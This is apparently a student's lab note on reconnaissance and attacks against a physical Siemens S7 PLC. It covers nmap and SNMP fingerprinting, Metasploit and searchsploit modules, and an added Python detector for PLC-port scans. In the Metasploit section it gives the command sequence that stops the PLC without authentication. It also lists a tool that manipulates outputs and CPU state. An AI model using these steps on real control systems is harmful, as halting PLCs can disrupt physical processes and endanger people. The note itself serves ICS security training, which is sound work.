06-real_hardware
Note imported from Inbox during bulk consolidation.
Real S7 Hardware Testing
Recon and fingerprint with NMAP
Let's find the Siemens physical device with sudo netdiscover -r 10.1.0.0/24
Then use nmap to scan the TCP ports on that IP address:
sudo nmap 10.1.0.11 -Pn -p 1-65535
and the UDP ports:
sudo nmap 10.1.0.11 -Pn -sU -F for the 100 most frequent UDP ports
We found UDP port 161 (SNMP) open.
SNMP Check
snmp-check 10.1.0.11 gives results showing:
- cpu type
- model number
- firmware number
- interfaces and slots
- mac address
- etc.
NMAP and its scripting engine
From the earlier nmap scan, we found TCP port 102 open as well.
Probe it with sudo nmap 10.1.0.11 -Pn -p 102 -sV
And use the nmap scripting engine with
sudo nmap 10.1.0.11 -Pn -p 102 --script s7-info.nse
This yields:
- module details
- hardware details
- version number
- mac address
Metasploit
start metasploit with
sudo msfconsole
then search Siemens
To use the Profinet Scanner, use the corresponding number. Based on my results I typed use 5
This module uses layer 2 packets for Profinet discovery to detect Siemens devices on a network.
Then type run to retrieve further information from the S7 PLC.
This will give results.
One can also use searchsploit s7 and then use hardware/remote/38964.rb after copying the files covered earlier in configuring searchsploit. This exploit can start and stop the S7 PLC. This is how:
setg RHOST 10.1.0.11 to set the host address.
set MODE STOP to use the STOP command.
run to run the stop command.
BOOM!! The PLC should stop running without any authentication!
PLCSCAN
sudo python2 plcscan.py 10.1.0.11 to run plcscan.
This checks whether port 102 or 502 is open on the target and extracts additional info.
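The scans above leave a trace a defender can look for: connections to the PLC's S7comm (TCP/102), Modbus (TCP/502) and SNMP (UDP/161) ports from hosts that are not engineering workstations, and one source hitting many distinct ports. This added example (not part of the original note) checks constructed flow-log lines for both patterns; the log format, the allowlist and the 10.1.0.99 source address are assumptions for the example.

```python
"""Flag PLC-protocol access from non-allowlisted hosts and port-sweep behaviour.
Log format, allowlist and the 10.1.0.99 source are constructed for this example."""
from collections import defaultdict

# Hypothetical allowlist: only these hosts may reach the PLC's management/control ports.
ENGINEERING_HOSTS = {"10.1.0.50"}
PLC_PORTS = {("tcp", 102): "S7comm", ("tcp", 502): "Modbus/TCP", ("udp", 161): "SNMP"}
SWEEP_THRESHOLD = 20  # distinct destination ports from one source before calling it a scan

# Constructed flow-log lines: "<proto> <src>:<sport> -> <dst>:<dport>"
# One legitimate S7comm session from the engineering host, then an unknown host
# touching SNMP and S7comm and sweeping TCP ports 1-25 on the PLC.
SAMPLE_LOG = """\
tcp 10.1.0.50:51022 -> 10.1.0.11:102
udp 10.1.0.99:40000 -> 10.1.0.11:161
tcp 10.1.0.99:40001 -> 10.1.0.11:102
""" + "\n".join(f"tcp 10.1.0.99:4{1000 + p:04d} -> 10.1.0.11:{p}" for p in range(1, 26))


def parse_line(line):
    """Split one flow-log line into (proto, src_ip, dst_ip, dst_port)."""
    proto, rest = line.split(" ", 1)
    src, dst = rest.split(" -> ")
    s_ip, _ = src.rsplit(":", 1)
    d_ip, d_port = dst.rsplit(":", 1)
    return proto, s_ip, d_ip, int(d_port)


def analyze(log_text, allowlist=ENGINEERING_HOSTS, threshold=SWEEP_THRESHOLD):
    """Return alert strings: PLC-port access from non-allowlisted hosts, then port sweeps."""
    alerts = []
    ports_by_src = defaultdict(set)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        proto, s_ip, d_ip, d_port = parse_line(line)
        ports_by_src[s_ip].add(d_port)
        service = PLC_PORTS.get((proto, d_port))
        if service and s_ip not in allowlist:
            alerts.append(f"{service} access to {d_ip}:{d_port} from non-engineering host {s_ip}")
    for s_ip, ports in ports_by_src.items():
        if len(ports) >= threshold:
            alerts.append(f"port sweep from {s_ip}: {len(ports)} distinct destination ports")
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert)
```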
ICSSecurityScripts
Navigate to the folder and then
sudo python3 SiemensScan.py to run the script.
This tool can:
- perform level 2 Profinet discovery
- configure network
- retrieve information
- manipulate inputs, outputs and registers
- toggle LEDs
- flip CPU state
- change device name
Next Section -> Gas Station Controller